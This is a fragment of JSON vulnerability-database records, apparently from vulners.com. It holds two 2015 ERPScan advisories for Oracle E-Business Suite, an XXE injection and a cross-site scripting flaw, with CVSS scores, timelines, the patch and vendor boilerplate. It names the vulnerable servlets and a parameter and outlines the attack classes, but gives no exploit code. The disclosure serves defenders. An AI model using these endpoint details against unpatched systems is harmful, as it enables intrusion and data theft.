"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "7591a4414fab4e00d545d96f67923bfe"}, {"key": "href", "hash": "91f326dd520bc78a7e8becd3c39b6be5"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "29738b7846c783fb3a4f2a49b7c4ccd3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d2381bcd69ce89f633080a3b3bcd22d9c6038a3c2512d85530ef0a4ad6a45bd8", "viewCount": 181, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14753"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32654", "bulletinFamily": "software", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4849"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "05f33ecfa6c5da775ada7be0946e9c35"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "e069b6a0eb846de58d51f6f1caccd76e"}, {"key": "href", "hash": "a034a18d00b9b8f4a3448812c0519f69"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "c9c62536a7dbd3fac9ecbf649050cab1"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "c4015e5d0067bf08940e133c4477451e433581d60a4c9b7745f8b69fced90c4c", "viewCount": 168, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4849"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-029"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32658", "bulletinFamily": "software", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality None &#40;N&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting &#40;XSS&#41; due\r\nto lack of sanitizing the &quot;domain&quot; parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4854"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "4b5a683c958427d1f139ea46960c1f77"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "ac4e2716cd1f40662335b0c2baefa8ac"}, {"key": "href", "hash": "793234d92076d083ca1ba3d060535b33"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "5015d42a9a849429bfd5eccdc891f977"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d412a2c5f1d57e01c882336bd5b7b03d9bbc5e601468b64828936dded249a019", "viewCount": 182, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4854"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-027"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015", "ORACLE:CPUOCT2015-2367953"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}]}